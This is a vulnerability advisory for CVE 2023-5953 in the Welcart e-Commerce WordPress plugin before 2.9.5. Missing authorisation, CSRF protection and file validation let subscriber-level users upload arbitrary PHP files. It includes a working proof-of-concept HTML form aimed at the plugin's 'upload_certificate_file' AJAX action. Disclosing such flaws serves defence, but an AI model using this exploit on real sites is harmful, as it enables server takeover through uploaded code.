Welcart e-Commerce < 2.9.5 – Subscriber+ Arbitrary File Upload | CVE 2023-5953

Description

The plugin does not validate files to be uploaded, as well as does not have authorisation and CSRF in an AJAX action handling such upload. As a result, any authenticated users, such as subscriber could upload arbitrary files, such as PHP on the server

Proof of Concept

Setup (As admin):
- Go the the Settlement Settings ad drag the "ペイジェント" module to the 'Settlement modules in use' section, then click the update button
- Setup the module and upload a certificate

Attack (as a subscriber), login to the blog, open a page with the code below and select a PHP file:
<body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
        <input type="text" name="action" value="upload_certificate_file"/>
        <input type="file" name="upfile"/>
        <input type="submit" value="submit"/>
    </form>
</body>

This will upload the php file to the uploads/xxxxx/ folder